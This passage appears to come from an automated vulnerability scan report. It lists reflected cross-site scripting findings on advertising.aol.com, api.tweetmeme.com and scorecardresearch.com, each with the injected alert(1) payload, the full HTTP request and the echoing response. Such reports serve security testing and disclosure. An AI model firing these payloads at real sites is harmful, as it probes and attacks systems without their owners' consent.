This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a2eae"-alert(1)-"175f56d7e11/6/3/807811660/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:50:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:50:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a2eae"-alert(1)-"175f56d7e11/6/3/807811660/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.81. http://advertising.aol.com/token/7/1/585611182/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/585611182/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89719"-alert(1)-"a97c2ea54f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /89719"-alert(1)-"a97c2ea54f5/7/1/585611182/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/89719"-alert(1)-"a97c2ea54f5/7/1/585611182/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.82. http://advertising.aol.com/token/7/3/1807570122/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1807570122/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26169"-alert(1)-"29c976540da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /26169"-alert(1)-"29c976540da/7/3/1807570122/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:50:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:50:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/26169"-alert(1)-"29c976540da/7/3/1807570122/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.83. http://advertising.aol.com/token/8/1/592246145/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/592246145/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9dd"-alert(1)-"568cf44b4ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6c9dd"-alert(1)-"568cf44b4ef/8/1/592246145/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6c9dd"-alert(1)-"568cf44b4ef/8/1/592246145/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.84. http://advertising.aol.com/token/8/3/1337747048/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/1337747048/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 210f6"-alert(1)-"9cf4537fd54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /210f6"-alert(1)-"9cf4537fd54/8/3/1337747048/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:51:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:51:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/210f6"-alert(1)-"9cf4537fd54/8/3/1337747048/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.85. http://api.tweetmeme.com/v2/follow.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.tweetmeme.com
Path:   /v2/follow.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d62cf<a>46058332c53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v2d62cf<a>46058332c53/follow.js?screen_name=ProfitNDTV&style=normal HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:39:19 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h03
Content-Length: 101

tweetmemedata({"status":"failure","reason":"unknown class of API call [api_v2d62cf<a>46058332c53]"});

6.86. http://api.tweetmeme.com/v2/follow.js [screen_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /v2/follow.js

Issue detail

The value of the screen_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37866"><script>alert(1)</script>cecc64bffc0 was submitted in the screen_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/follow.js?screen_name=ProfitNDTV37866"><script>alert(1)</script>cecc64bffc0&style=normal HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:38:39 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h02
Content-Length: 2714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <title>TweetMeme F
...[SNIP]...
<a class="profile_image" href="http://twitter.com/ProfitNDTV37866"><script>alert(1)</script>cecc64bffc0" title="View Profile On Twitter">
...[SNIP]...

6.87. http://api.tweetmeme.com/v2/follow.js [style parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /v2/follow.js

Issue detail

The value of the style request parameter is copied into the HTML document as plain text between tags. The payload b846e<script>alert(1)</script>6b69e2d3a59 was submitted in the style parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/follow.js?screen_name=ProfitNDTV&style=normalb846e<script>alert(1)</script>6b69e2d3a59 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:38:49 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h04
Content-Length: 69

normalb846e<script>alert(1)</script>6b69e2d3a59 is not a valid style.

6.88. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 197ba<script>alert(1)</script>2e3c3b8e2de was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8197ba<script>alert(1)</script>2e3c3b8e2de&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:40:57 GMT
Date: Sun, 04 Sep 2011 02:40:57 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8197ba<script>alert(1)</script>2e3c3b8e2de", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



6.89. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload d00a9<script>alert(1)</script>7e4cf8a89f7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=d00a9<script>alert(1)</script>7e4cf8a89f7&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:12 GMT
Date: Sun, 04 Sep 2011 02:41:12 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"d00a9<script>alert(1)</script>7e4cf8a89f7", c15:"", c16:"", r:""});



6.90. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 28839<script>alert(1)</script>d30932a9a0c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=28839<script>alert(1)</script>d30932a9a0c HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:14 GMT
Date: Sun, 04 Sep 2011 02:41:14 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"28839<script>alert(1)</script>d30932a9a0c", c16:"", r:""});



6.91. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 61a67<script>alert(1)</script>770386f5374 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=686432261a67<script>alert(1)</script>770386f5374&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:00 GMT
Date: Sun, 04 Sep 2011 02:41:00 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"686432261a67<script>alert(1)</script>770386f5374", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



6.92. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c09f3<script>alert(1)</script>0f05b6d2d69 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=c09f3<script>alert(1)</script>0f05b6d2d69&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:03 GMT
Date: Sun, 04 Sep 2011 02:41:03 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"c09f3<script>alert(1)</script>0f05b6d2d69", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



6.93. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 582f7<script>alert(1)</script>fc5b3be0a1c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=582f7<script>alert(1)</script>fc5b3be0a1c&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:05 GMT
Date: Sun, 04 Sep 2011 02:41:05 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"582f7<script>alert(1)</script>fc5b3be0a1c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



6.94. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload d9b47<script>alert(1)</script>c2908fe773b was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=d9b47<script>alert(1)</script>c2908fe773b&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:07 GMT
Date: Sun, 04 Sep 2011 02:41:07 GMT
Content-Length: 1234
Connection: close

